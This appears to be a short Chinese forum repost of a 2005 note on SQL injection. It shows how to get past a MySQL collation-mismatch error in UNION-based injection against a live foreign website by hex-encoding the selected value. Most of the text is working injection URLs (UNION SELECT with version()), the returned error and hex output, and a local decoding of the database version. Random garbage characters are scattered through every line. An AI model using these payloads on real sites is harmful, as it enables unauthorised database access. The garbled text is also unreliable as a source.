本文作者:SuperHei
3 e2 s0 |, {: z: ?+ Z! |4 @" y) F文章性质:原创1 h) d& p' L7 s" ?( `
发布日期:2005-10-18& @- b0 B- e9 `1 o
测试个国外的站时:
; U1 s: s+ W9 _' curl:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*
; n, A; C: ]* Z7 V( y返回错误:( Z' T2 _+ A4 g8 U+ a7 O; M
Illegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
2 N" B4 a" V- e6 u BMySQL Error No. 1264 V/ F% c+ }5 T! _
看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。
. b4 m X. v) l3 _. f' P) y: t解决办法:转为其他编码如hex。" m. H8 B( T/ X5 B7 z+ @/ J) ?
url:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*: v! z' d: y7 y t0 F+ ]8 i
成功得到hex(version())的值为:$ q9 i6 K7 }, A
342E312E332D62657461. B! Y* a; S: d1 b0 S$ g% d/ o1 \
回Mysql查询下得到:
5 j" b* z6 s; o _- Zmysql> select 0x342E312E332D62657461;
2 P0 P0 O* E/ \8 C7 b; ~/ ?+------------------------+: D* G6 E" h" G
| 0x342E312E332D62657461 |
0 X, V+ i1 x% W+ q; Y# S+------------------------+3 l4 ]2 W2 A1 A" W" h
| 4.1.3-beta |
6 K9 W6 q1 K- h5 L+ i4 L+------------------------+0 a+ \# A! q1 @7 \# z
1 row in set (0.00 sec)! O6 c9 @) s2 P# ~8 Y- Y2 D
# `" \8 b8 g g3 ^ |
发表于 2012-9-15 14:04:54
收藏
支持
反对